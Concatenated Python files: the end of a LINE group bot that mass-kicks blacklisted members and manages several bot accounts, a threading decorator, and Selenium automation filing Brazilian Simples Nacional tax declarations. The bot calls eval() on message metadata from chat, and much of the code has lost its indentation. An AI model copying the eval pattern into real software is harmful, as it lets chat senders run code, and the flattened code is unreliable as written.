mb += '┣ ' + str(b) + ". " +a001.getGroup(ls).name + "\n"
a001.sendReplyMessage(reply, receiver, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Protect\n┣━━━━ Protect Max\n"+ma+"┣━━━━ Strict Mode\n"+mb+"┗━ Total [ %s ] Protection" %(str(len(promax)+len(strictmode))))
elif hlth == "purge":
if sender in creator or sender in owner:
group = a001.getGroup(receiver)
gMembMids = [contact.mid for contact in group.members]
match = []
for target in status["blacklist"]:
match+=filter(lambda str: str == target, gMembMids)
if match == []:
a001.sendReplyMessage(reply,receiver,"Nothing")
return
for fck in match:
try:
fckX = threading.Thread(target=kick, args=(receiver, fck)).start()
except:
pass
elif hlth.startswith("protect "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("protect ","")
if spl == "max":
if receiver in status["promax"]:
hlth = "Group Protection Max"
else:
status["promax"].append(receiver)
hlth = "Access Granted - Protection Active"
try:
group = a001.getGroup(receiver)
if group.preventedJoinByTicket == False:
progqr = a001.getGroup(receiver)
progqr.preventedJoinByTicket = True
a001.updateGroup(progqr)
settings["changeGroupName"][receiver] = group.name
settings["changeGroupPicture"][receiver] = group.pictureStatus
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
except:
pass
a001.sendReplyMessage(reply,receiver,"[ Protection ]\n" + hlth)
if spl == "none":
if receiver in status["promax"]:
status["promax"].remove(receiver)
hlth = "Access Granted - Protection Nonactive"
else:
hlth = "Group Protection None"
a001.sendReplyMessage(reply,receiver,"[ Protection ]\n" + hlth)
elif hlth.startswith("strictmode "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("strictmode ","")
if spl == "on":
if receiver in status["strictmode"]:
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nStill Active")
else:
status["strictmode"].append(receiver)
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nAccess Granted - Strict Mode Enable")
try:
a001.inviteIntoGroup(receiver,[M003D23])
except:
try:
a002.inviteIntoGroup(receiver,[M003D23])
except:
try:
a003.leaveGroup(receiver)
except:
pass
if spl == "off":
if receiver in status["strictmode"]:
status["strictmode"].remove(receiver)
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nAccess Granted - Strict Mode Disable")
try:
a003.acceptGroupInvitation(receiver)
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nNot Active")
elif hlth.startswith("checkbot"):
if sender in creator or sender in owner or sender in admin:
try:a001.inviteIntoGroup(to, [M001D23]);has = "OK"
except:has = "NOT"
try:a001.kickoutFromGroup(to, [M001D23]);has1 = "OK"
except:has1 = "NOT"
if has == "OK":sil = "Normal"
else:sil = "Down!"
if has1 == "OK":sil1 = "Normal"
else:sil1 = "Down!"
a001.sendReplyMessage(reply, receiver, "[ Bots Status ]\n- Invite: {}\n- Kick: {}".format(sil1,sil))
try:a002.inviteIntoGroup(to, [M002D23]);has = "OK"
except:has = "NOT"
try:a002.kickoutFromGroup(to, [M002D23]);has1 = "OK"
except:has1 = "NOT"
if has == "OK":sil = "Normal"
else:sil = "Down!"
if has1 == "OK":sil1 = "Normal"
else:sil1 = "Down!"
a002.sendReplyMessage(reply, receiver, "[ Bots Status ]\n- Invite: {}\n- Kick: {}".format(sil1,sil))
try:a003.inviteIntoGroup(to, [M003D23]);has = "OK"
except:has = "NOT"
try:a003.kickoutFromGroup(to, [M003D23]);has1 = "OK"
except:has1 = "NOT"
if has == "OK":sil = "Normal"
else:sil = "Down!"
if has1 == "OK":sil1 = "Normal"
else:sil1 = "Down!"
a003.sendReplyMessage(reply, receiver, "[ Bots Status ]\n- Invite: {}\n- Kick: {}".format(sil1,sil))
elif hlth.startswith("changename:1 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname = a001.getProfile()
dname.displayName = name
a001.updateProfile(dname)
a001.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
a001.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changename:2 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname = a002.getProfile()
dname.displayName = name
a002.updateProfile(dname)
a002.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
a002.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changename:3 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname = a003.getProfile()
dname.displayName = name
a003.updateProfile(dname)
a003.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
a003.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changename:all "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname1 = a001.getProfile()
dname1.displayName = name
a001.updateProfile(dname1)
a001.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
dname2 = a002.getProfile()
dname2.displayName = name
a002.updateProfile(dname2)
a002.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
dname3 = a003.getProfile()
dname3.displayName = name
a003.updateProfile(dname3)
a003.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
for a in Botslist:
a.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:1 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio = a001.getProfile()
bio.statusMessage = name
a001.updateProfile(bio)
a001.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
a001.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:2 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio = a002.getProfile()
bio.statusMessage = name
a002.updateProfile(bio)
a002.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
a002.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:3 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio = a003.getProfile()
bio.statusMessage = name
a003.updateProfile(bio)
a003.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
a003.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:all "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio1 = a001.getProfile()
bio1.statusMessage = name
a001.updateProfile(bio1)
a001.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
bio2 = a002.getProfile()
bio2.statusMessage = name
a002.updateProfile(bio2)
a002.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
bio3 = a003.getProfile()
bio3.statusMessage = name
a003.updateProfile(bio3)
a003.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
for a in Botslist:
a.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changepict:"):
if sender in creator or sender in owner:
spl = hlth.replace("changepict:","")
if spl == "1":
settings["updatePict"][M001D23] = True
a001.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
if spl == "2":
settings["updatePict"][M002D23] = True
a002.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
if spl == "3":
settings["updatePict"][M003D23] = True
a003.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
if spl == "all":
settings["updatePict"][M001D23] = True
settings["updatePict"][M002D23] = True
settings["updatePict"][M003D23] = True
for a in Botslist:
a.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
else:
a001.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nAccess Limited For Owner Only")
elif hlth.startswith("kick"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in creator or target in owner or target in admin or target in staff or target in Bots or target in mybots:
pass
else:
try:
d23X_72 = threading.Thread(target=kick, args=(receiver, target)).start()
except:
pass
elif hlth.startswith("invite "):
if sender in creator or sender in owner:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
try:
d23X_73 = threading.Thread(target=invite, args=(receiver, ls)).start()
except:
pass
elif hlth.startswith("invto "):
if sender in creator or sender in owner:
cond = text.split(" ")
num = int(cond[1])
gid = a001.getGroupIdsJoined()
group = a001.getGroup(gid[num-1])
a001.findAndAddContactsByMid(sender)
a001.inviteIntoGroup(gid[num-1],[sender])
a001.sendReplyMessage(reply,receiver, "Invited: "+str(group.name))
if op.type == 15 or op.type == 128:
if op.type == 15: print ("[ 15 ] NOTIFIED LEAVE GROUP")
else: print ("[ 128 ] NOTIFIED DELETE SELF FROM CHAT")
if op.param1 in status["strictmode"]:
if op.param2 == M003D23:
try:
strict = threading.Thread(target=invite, args=(op.param1, op.param2)).start()
except:
pass
backupData()
except Exception as error:
logError(error)
traceback.print_tb(error.__traceback__)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def run():
    """Main polling loop: fetch batches of LINE operations and dispatch each.

    Blocks forever.  Any exception raised while fetching or handling a batch
    is logged via ``logError`` and polling resumes on the next iteration.
    Relies on module globals: ``oepoll``, ``loop``, ``mobanzu``, ``logError``.
    """
    while True:
        try:
            # singleTrace returns a batch of pending operations, or None
            # when there is nothing new to process.
            ops = oepoll.singleTrace(count=50)
            if ops is not None:  # idiomatic identity check (was `!= None`)
                for op in ops:
                    loop.run_until_complete(mobanzu(op))
                    # Advance the poll cursor so this op is not re-delivered.
                    oepoll.setRevision(op.revision)
        except Exception as error:
            logError(error)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
if __name__ == '__main__':
    # Announce startup BEFORE entering the blocking poll loop: run() never
    # returns, so in the original order this message (and everything after
    # it) was unreachable.
    print('\n》》》》PROGRAM STARTED《《《《\n')
    # NOTE(review): removed the old trailing line
    #   threading.Thread(target=loop.run_until_complete(mobanzu(op))).start()
    # It was dead code (after an infinite loop) and buggy on two counts:
    # it *called* run_until_complete immediately instead of passing a
    # callable as `target`, and it referenced `op`, which is undefined at
    # module scope.
    run()
|
util.py | from threading import Thread
def postpone(function):
    """Decorator: run *function* asynchronously in a daemon background thread.

    The decorated call returns immediately.  The started ``threading.Thread``
    is returned so callers may ``join()`` it when they need to wait for
    completion — a backward-compatible generalization (the original wrapper
    returned ``None``).  Daemon threads do not block interpreter shutdown.
    """
    from functools import wraps  # local import: keeps the module header untouched

    @wraps(function)  # preserve __name__/__doc__ of the wrapped function
    def decorator(*args, **kwargs):
        t = Thread(target=function, args=args, kwargs=kwargs)
        t.daemon = True
        t.start()
        return t  # expose the thread handle instead of discarding it
    return decorator
|
rotina_pgdas.py | from time import sleep
from default.webdriver_utilities import *
from default.interact import *
from smtp_project.init_email import JsonDateWithImprove
from default.settings import SetPaths
from default.data_treatment import ExcelToData
class PgdasAnyCompt(WDShorcuts, SetPaths, ExcelToData):
def __init__(self, compt_file=None):
"""
:param compt_file: from GUI
# remember past_only arg from self.get_atual_competencia
"""
import pandas as pd
from default.webdriver_utilities.pre_drivers import pgdas_driver
from .relacao_nfs import tres_valores_faturados
# O vencimento DAS(seja pra qual for a compt) está certo, haja vista que se trata do mes atual
sh_names = 'sem_mov', 'G5_ISS', 'G5_ICMS'
if compt_file is None:
"""# Atualização, 14/01/2021"""
# self.set_compt_only() == self.set_get_compt_file(file_type=None)
# a = self.set_get_compt_file(file_type=None, m_cont=12)
# descobri como fazer..
compt_file = self.compt_and_filename()
compt, excel_file_name = compt_file
else:
compt, excel_file_name = compt_file
intelligence_existence = self.intelligence_existence_done('CERT_vs_LOGIN.xlsx')
inteligence_db = {'CLIENT': [],
'CERT x LOGIN': []
}
client_db_name = inteligence_db['CLIENT']
cert_x_login = inteligence_db['CERT x LOGIN']
cont_inteligence = -1
for sh_name in sh_names:
# agora eu posso fazer downloalds sem me preocupar tendo a variável path
mshExcelFile = pd.ExcelFile(excel_file_name)
msh = mshExcelFile.parse(sheet_name=str(sh_name))
col_str_dic = {column: str for column in list(msh)}
msh = mshExcelFile.parse(sheet_name=str(sh_name), dtype=col_str_dic)
READ = self.le_excel_each_one(msh)
self.after_READ = self.readnew_lista(READ, False)
after_READ = self.after_READ
# if sh_name not in 'sem_mov':
print(cont_inteligence)
print(f'cont inteligence plan {sh_name}')
for i, CNPJ in enumerate(after_READ['CNPJ']):
if 'G5' in sh_name:
cont_inteligence += 1
# ####################### A INTELIGENCIA EXCEL ESTÁ SEM OS SEM MOVIMENTOS NO MOMENTO
CLIENTE = after_READ['Razão Social'][i]
JA_DECLARED = after_READ['Declarado'][i].upper().strip()
CodSim = after_READ['Código Simples'][i]
CPF = after_READ['CPF'][i]
cont_ret_n_ret = i
if CLIENTE == '':
break
self.now_person = CLIENTE
self.client_path = self._files_path_v3(CLIENTE, wexplorer_tup=compt_file)
# if not existe o arquivo my_wised_check_path_file -> no momento atual, existe
def cria_inteligence():
print('Intelligence does not exist')
self.loga_cert()
# driver.set_window_position(-1055, 0)
# muda o client, no ECAC, é apenas uma função teste
element = self.intelligence_cnpj_test_element(CNPJ)
if element != '':
client_db_name.append(CLIENTE)
cert_x_login.append('loginComCodSim')
self.loga_simples(CNPJ, CPF, CodSim, CLIENTE)
print(f'Não preciso logar (if element != "") p/ criar inteligence. \n{CLIENTE}, '
f'por isso, break')
"""
print(f'PRESSIONE ENTER P/ PROSSEGUIR, {CLIENTE}')
press_key_b4('enter')
while True:
try:
driver.implicitly_wait(5)
submit = driver.find_element_by_xpath("//input[@type='submit']").click()
break
except (NoSuchElementException, ElementClickInterceptedException):
print('sleeping, line 167. Cadê o submit?')
driver.refresh()
driver.implicitly_wait(5)
# implicitly_wait -> if element was already appeared, it'll not wait.
"""
else:
client_db_name.append(CLIENTE)
cert_x_login.append('certificado')
print('SUCESSO, CERTIFICADO, ', CLIENTE)
# checa se a inteligencia não existe
try:
# driver.set_window_position(initial['x'], initial['y'])
driver.close()
# está ok o unbound me ajuda
except UnboundLocalError:
pass
if isinstance(intelligence_existence, list) and JA_DECLARED not in ['S', 'OK', 'FORA'] and cont_inteligence >= 0:
__client_path = self.client_path
self.driver = pgdas_driver(__client_path)
driver = self.driver
super().__init__(driver)
driver.implicitly_wait(2)
# initial = driver.get_window_position()
driver.get('https://www.google.com.br')
print('ecac_or_simples')
try:
ecac_or_simples = intelligence_existence[cont_inteligence][1]
except IndexError:
print('FINISH')
break
# input(intelligence_existence[cont_inteligence][0]) # -> O NOME DO CLIENTE
my_new_3valores = tres_valores_faturados(__client_path)
print(my_new_3valores, '----> my_new_3valores')
def return_valor():
if sh_names.index(sh_name) != 0:
if sh_names.index(sh_name) == 1:
if my_new_3valores:
print(my_new_3valores[0])
VALOR = [v for v in my_new_3valores[0].values()][0]
else:
VALOR = after_READ['Valor'][i]
if VALOR == '0':
# or VALOR == '':
VALOR = ''
return VALOR
else:
VALOR = after_READ['Valor'][i]
if VALOR == '0': # or VALOR == '':
VALOR = ''
return VALOR
if 'zerou' in str(VALOR).lower():
VALOR = ''
else:
if '.' not in str(VALOR):
VALOR = f'{VALOR},00'
elif VALOR != '':
VALOR = f'{float(VALOR):.2f}'
VALOR = self.trata_money_excel(VALOR)
else:
self.icms_prossegue = False # não está em uso ainda
else:
VALOR = ''
print('VALOR BEFORE RETURN', VALOR)
return VALOR
VALOR = return_valor()
# Tratei o que dá pra fazer no certificado e o que não dá
if ecac_or_simples == 'certificado':
self.loga_cert()
# loga ECAC, Insere CNPJ
self.change_ecac_client(CNPJ)
self.current_url = driver.current_url
self.opta_script() if self.m() == 12 else None
else:
self.loga_simples(CNPJ, CPF, CodSim, CLIENTE)
self.current_url = driver.current_url
self.opta_script() if self.m() == 12 else None
self.compt_typist(compt)
# faz outras declaracoes se necessarias
"""NÃO FUNCIONANDO CORRETAMENTE AINDA"""
if self.check_make_pendencies():
for compt_p2 in self.check_make_pendencies():
print(compt_p2, 'compt_p2')
self.compt_typist(compt_p2, '/'.join(driver.current_url.split('/')[:-1]))
self.DECLARA(compt_p2, sh_names.index(sh_name), '', False,
cont_ret_n_ret)
# # CRIAR NOVA PASTA, SALVAR NO LUGAR CERTO POIS NÃO TA SALVANDO ENFIM, CONFERIR O DECLARA ONDE ESTÁ SALVANDO
self.compt_typist(compt, '/'.join(driver.current_url.split('/')[:-1]))
else:
self.compt_typist(compt)
self.DECLARA(compt, sh_names.index(sh_name), VALOR, my_new_3valores, cont_ret_n_ret)
print('CLOSE DRIVE EM 5 SEGS')
sleep(5)
driver.close()
elif cont_inteligence == -1:
if JA_DECLARED not in ['S', 'OK']:
print('estou em sem movimento, vou arrumar ainda')
__client_path = self.client_path
self.driver = pgdas_driver(__client_path)
driver = self.driver
super().__init__(self.driver)
if CodSim != '-' and CodSim != '':
# Código simples existe # SEM MOVIMENTO
self.loga_simples(CNPJ, CPF, CodSim, CLIENTE)
else:
# Código sim inexistente
self.loga_cert()
self.change_ecac_client(CNPJ)
self.current_url = driver.current_url
self.opta_script() if self.m() == 12 else None
VALOR = 'zerou'
print('!!!ZEROU!!!')
self.compt_typist(compt)
# faz outras declaracoes se necessarias
if self.check_make_pendencies():
for compt_p2 in self.check_make_pendencies():
print(compt_p2, 'compt_p2')
self.compt_typist(compt_p2, '/'.join(driver.current_url.split('/')[:-1]))
self.DECLARA(compt_p2, sh_names.index(sh_name), '', False,
cont_ret_n_ret)
self.compt_typist(compt, '/'.join(driver.current_url.split('/')[:-1]))
else:
self.compt_typist(compt)
self.DECLARA(compt, sh_names.index(sh_name), VALOR, 'zerou', cont_ret_n_ret)
elif not intelligence_existence:
# se não existir vai criar.
cria_inteligence()
else:
print(f'{CLIENTE} \nJA DECLARADO: {JA_DECLARED}\n-----------------')
def loga_cert(self):
    """Log into e-CAC with the digital certificate.

    Loads the e-CAC login page (retrying on timeouts), opens the gov.br
    SSO certificate-authorization URL, clicks "Certificado digital" and
    then drives the native certificate-selection dialog with keystrokes.

    :return: None; leaves ``self.driver`` on the authenticated page.
    """
    from threading import Thread
    from pyautogui import hotkey
    driver = self.driver
    # Keep retrying until the login page actually loads.
    while True:
        try:
            driver.get('https://cav.receita.fazenda.gov.br/autenticacao/login')
            driver.set_page_load_timeout(30)
            break
        except TimeoutException:
            driver.refresh()
        finally:
            sleep(1)
    activate_window('eCAC - Centro Virtual de Atendimento')
    # Go straight to the gov.br SSO certificate authorization endpoint.
    driver.get(
        'https://sso.acesso.gov.br/authorize?response_type=code&client_id=cav.receita.fazenda.gov.br&'
        'scope=openid+govbr_recupera_certificadox509+govbr_confiabilidades&'
        'redirect_uri=https://cav.receita.fazenda.gov.br/autenticacao/login/govbrsso')
    initial = driver.find_element_by_link_text('Certificado digital')
    print('ativando janela acima, logando certificado abaixo, linhas 270')
    sleep(2)
    # The click opens a native (blocking) certificate dialog, so only it runs
    # in a background thread; the keystrokes below run from this thread.
    # BUGFIX: the old code wrapped each call as ``Thread(target=f(args))``,
    # which invokes ``f`` immediately and gives the Thread a ``None`` target,
    # so everything already ran sequentially -- this makes that explicit.
    Thread(target=initial.click).start()
    sleep(2.5)
    # Move down once before confirming, to pick the right certificate entry.
    hotkey('down')
    sleep(2)
    hotkey('enter')
def intelligence_existence_done(self, file: str):
    """Load the intelligence spreadsheet, if it has already been generated.

    :param file: spreadsheet file name (e.g. ``'foo.xlsx'``), resolved in
        the same directory as the path returned by ``self.compt_and_filename()``.
    :return: the sheet rows as a list of lists (``dtype=str``), or
        ``False`` when the spreadsheet does not exist yet.
    """
    try:
        compt, path_name = self.compt_and_filename()
        # Swap the file component of ``path_name`` for ``file``.
        directory = '/'.join(path_name.split('/')[:-1])
        path_name = f'{directory}/{file}'.replace('//', '/')
        print(path_name)
        inteligence_done = pd.read_excel(path_name, dtype=str)
        # (A dead ``for value in df: pass`` loop used to sit here.)
        return inteligence_done.to_numpy().tolist()
    except FileNotFoundError:
        print('intelligence will be done')
        return False
def intelligence_cnpj_test_element(self, CNPJ):
    """Probe, inside e-CAC, whether this login can access a given CNPJ.

    Switches the access profile to "attorney of a legal entity" for the
    CNPJ and reads the error banner the portal shows.
    Used only while building the intelligence spreadsheet.

    :param CNPJ: the client's CNPJ to test.
    :return: the stripped error-banner text (empty when access works).
    """
    driver = self.driver

    def elem_with_text(elem, searched):
        # First ``elem`` tag whose text contains ``searched``.
        _tag = driver.find_element_by_xpath(f"//{elem}[contains(text(),'{searched.rstrip()}')]")
        return _tag

    self.tags_wait('html', 'span')
    sleep(5)
    # nextcl = elem_with_text("span", "Alterar perfil de acesso")
    # nextcl.click()
    driver.find_element_by_id('btnPerfil').click()
    # Switch the profile and type in the CNPJ.
    self.tags_wait('label')
    cnpj = elem_with_text("label", "Procurador de pessoa jurídica - CNPJ")
    cnpj.click()
    sleep(.5)
    self.send_keys_anywhere(CNPJ)
    sleep(1)
    self.send_keys_anywhere(Keys.TAB)
    self.send_keys_anywhere(Keys.ENTER)
    sleep(1)
    # driver.find_element_by_class_name('access-button').click()
    # sleep(10)
    antigo = driver.current_url  # NOTE(review): unused here; mirrors change_ecac_client
    """I GOT IT"""
    # switch_to.frame...
    # The banner text is the verdict: empty means the CNPJ is accessible.
    element = driver.find_element_by_class_name('mensagemErro').text
    element = element.strip()
    print(element)
    driver.get(
        'https://sinac.cav.receita.fazenda.gov.br/simplesnacional/aplicacoes/atspo/pgdasd2018.app/')
    return element
def loga_simples(self, CNPJ, CPF, CodSim, CLIENTE):
    """Log into the Simples Nacional portal using the access code.

    Fills CNPJ, the responsible person's CPF and the access code, plays
    the audio captcha, then waits for the human operator to type the
    captcha and press ENTER before submitting.

    :param CNPJ: company CNPJ.
    :param CPF: CPF of the responsible person.
    :param CodSim: Simples Nacional access code.
    :param CLIENTE: client name (used only in the operator prompt).
    """
    driver = self.driver
    # NOTE(review): the page is loaded twice back to back -- presumably a
    # warm-up reload the portal needs; confirm before removing.
    driver.get(
        'https://www8.receita.fazenda.gov.br/SimplesNacional/controleAcesso/Autentica.aspx?id=60')
    driver.get(
        'https://www8.receita.fazenda.gov.br/SimplesNacional/controleAcesso/Autentica.aspx?id=60')
    # Retry the whole form while we remain on the login page (URL ends in id=60).
    while str(driver.current_url.strip()).endswith('id=60'):
        self.tags_wait('body')
        self.tags_wait('html')
        self.tags_wait('input')
        # driver.find_elements_by_xpath("//*[contains(text(), 'CNPJ:')]")[0].click()
        # pygui.hotkey('tab', interval=0.5)
        cpcp = driver.find_element_by_name('ctl00$ContentPlaceHolder$txtCNPJ')
        cpcp.clear()
        cpcp.send_keys(CNPJ)
        cpfcpf = driver.find_element_by_name('ctl00$ContentPlaceHolder$txtCPFResponsavel')
        cpfcpf.clear()
        cpfcpf.send_keys(CPF)
        cod = driver.find_element_by_name('ctl00$ContentPlaceHolder$txtCodigoAcesso')
        cod.clear()
        cod.send_keys(CodSim)
        cod_caract = driver.find_element_by_id('txtTexto_captcha_serpro_gov_br')
        btn_som = driver.find_element_by_id('btnTocarSom_captcha_serpro_gov_br')
        sleep(2.5)
        # Play the audio captcha and focus its text box for the operator.
        btn_som.click()
        sleep(.5)
        cod_caract.click()
        print(f'PRESSIONE ENTER P/ PROSSEGUIR, {CLIENTE}')
        press_key_b4('enter')
        # Submit, retrying while the button is missing or covered.
        while True:
            try:
                submit = driver.find_element_by_xpath("//input[@type='submit']").click()
                break
            except (NoSuchElementException, ElementClickInterceptedException):
                print('sleepin'
                      'g, line 167. Cadê o submit?')
                driver.refresh()
                sleep(5)
        sleep(5)
def change_ecac_client(self, CNPJ):
    """Switch the e-CAC profile to a client's CNPJ and open PGDAS-D.

    Changes the access profile to "attorney of a legal entity", visits
    the PGDAS-D app, logs out of the embedded frame session, and leaves
    the driver on the PGDAS-D declaration site.

    :param CNPJ: the client's CNPJ to act on behalf of.
    """
    driver = self.driver

    def elem_with_text(elem, searched):
        # First ``elem`` tag whose text contains ``searched``.
        _tag = driver.find_element_by_xpath(f"//{elem}[contains(text(),'{searched.rstrip()}')]")
        return _tag

    self.tags_wait('html', 'span')
    sleep(5)
    # nextcl = elem_with_text("span", "Alterar perfil de acesso")
    # nextcl.click()
    btn_perfil = WebDriverWait(self.driver, 20).until(
        expected_conditions.presence_of_element_located((By.ID, 'btnPerfil')))
    self.click_ac_elementors(btn_perfil)
    # Switch the profile and type in the CNPJ.
    self.tags_wait('label')
    cnpj = elem_with_text("label", "Procurador de pessoa jurídica - CNPJ")
    cnpj.click()
    sleep(.5)
    self.send_keys_anywhere(CNPJ)
    sleep(1)
    self.send_keys_anywhere(Keys.TAB)
    self.send_keys_anywhere(Keys.ENTER)
    sleep(1)
    # driver.find_element_by_class_name('access-button').click()
    # sleep(10)
    antigo = driver.current_url
    """I GOT IT"""
    # switch_to.frame...
    sleep(5)
    # Bounce through PGDAS-D once, then return to where we were.
    driver.get(
        'https://sinac.cav.receita.fazenda.gov.br/simplesnacional/aplicacoes/atspo/pgdasd2018.app/')
    sleep(2.5)
    driver.get(antigo)
    driver.get('https://cav.receita.fazenda.gov.br/ecac/Aplicacao.aspx?id=10009&origem=menu')
    driver.switch_to.frame(driver.find_element_by_tag_name("iframe"))
    sleep(2)
    # Log out of the embedded session (glyphicon-off), asking the operator
    # to press ESC whenever the click is blocked or the button is missing.
    while True:
        try:
            driver.find_element_by_xpath('//span[@class="glyphicon glyphicon-off"]').click()
            driver.refresh()
            break
        except ElementClickInterceptedException:
            print('---> PRESSIONE ESC PARA CONTINUAR <--- glyphicon-off intercepted')
            press_key_b4('esc')
        except NoSuchElementException:
            print('---> PRESSIONE ESC PARA CONTINUAR NoSuchElement glyphicon-off')
            press_key_b4('esc')
            driver.get(
                'https://sinac.cav.receita.fazenda.gov.br/simplesnacional/aplicacoes/atspo/pgdasd2018.app/')
            driver.implicitly_wait(5)
            break
    sleep(3)
    driver.switch_to.default_content()
    """I GOT IT"""
    # Finally land on the PGDAS-D declaration app.
    driver.get(
        'https://sinac.cav.receita.fazenda.gov.br/simplesnacional/aplicacoes/atspo/pgdasd2018.app/')
    driver.implicitly_wait(5)
def compt_typist(self, compt, came_from=None):
    """Open the "declaracao" page and type the competência into it.

    :param compt: competência in ``'MM-YYYY'`` format, typed into the
        ``pa`` (período de apuração) field when that field exists.
    :param came_from: base URL to navigate from (used when handling
        multiple pending declarations); when ``None``, the current URL
        is extended with ``declaracao?clear=1`` if needed.
    :return: None; leaves the single declaração page open.
    """
    driver = self.driver
    print('ÚNICA DECLARACAO')
    print('JA_DECLARED não -> prossegue')
    onlif = 'declaracao'
    if came_from:
        # BUGFIX: strip only a single LEADING slash before joining.
        # The old ``came_from.replace(came_from[0], '')`` removed every
        # slash in the URL, mangling it.
        if came_from[0] == '/':
            came_from = came_from[1:]
        driver.get(came_from + '/' + onlif)
    else:
        if onlif not in driver.current_url:
            driver.execute_script(f"""window.location.href += '{onlif}?clear=1'""")
    self.tags_wait('body', 'input')
    driver.implicitly_wait(10)
    sleep(2.5)
    try:
        periodo = driver.find_element_by_id('pa')
        periodo.send_keys(compt)
        self.find_submit_form()
    except NoSuchElementException:
        # The period field is absent when the declaração opens directly.
        pass
def check_make_pendencies(self):
    """Scan the current page for pending (undeclared) competências.

    The portal shows two ``errorMsg`` banners when earlier periods are
    still open; the first banner lists the pending competências.

    :return: list of pending competências as ``'MM-YYYY'`` strings when
        there are at most 11 of them, otherwise ``False``.
    """
    driver = self.driver
    # ``find_elements_*`` returns a (possibly empty) list and never raises
    # NoSuchElementException, so the old try/``raise e`` wrapper was dead.
    error_msg = driver.find_elements_by_class_name('errorMsg')
    if len(error_msg) != 2:
        # Explicit False instead of the old implicit None (both falsy).
        return False
    # Strip punctuation, then keep only the 'MM/YYYY' tokens.
    text = error_msg[0].text.translate(str.maketrans('', '', ':,.'))
    compt_pendencias = [token.replace('/', '-')
                        for token in text.split(' ') if '/' in token]
    print(compt_pendencias)
    if len(compt_pendencias) <= 11:
        print('\033[1;31mPOR PADRÃO, check_make_pendencies irá zerar o valor...\033[m')
        return compt_pendencias
    return False
    # raise IOError('FAZER COMPETÊNCIAS PASSADAS...')
def DECLARA(self, compt, sheet_id, valor_declarado, my_new_3valores, cont_ret_n_ret):
    """Fill and transmit one PGDAS-D declaração for the current client.

    When the confirmation dialog (``jsMsgBoxConfirm``) is present, the
    operator chooses via function keys: F2 only regenerates the last
    files, F4 rectifies, F10 consolidates to the month's last date,
    F11 skips to the next client.  Otherwise (or after F4 raises into
    the except branch) the revenue value is typed and submitted.

    :param compt: competência being declared ('MM-YYYY').
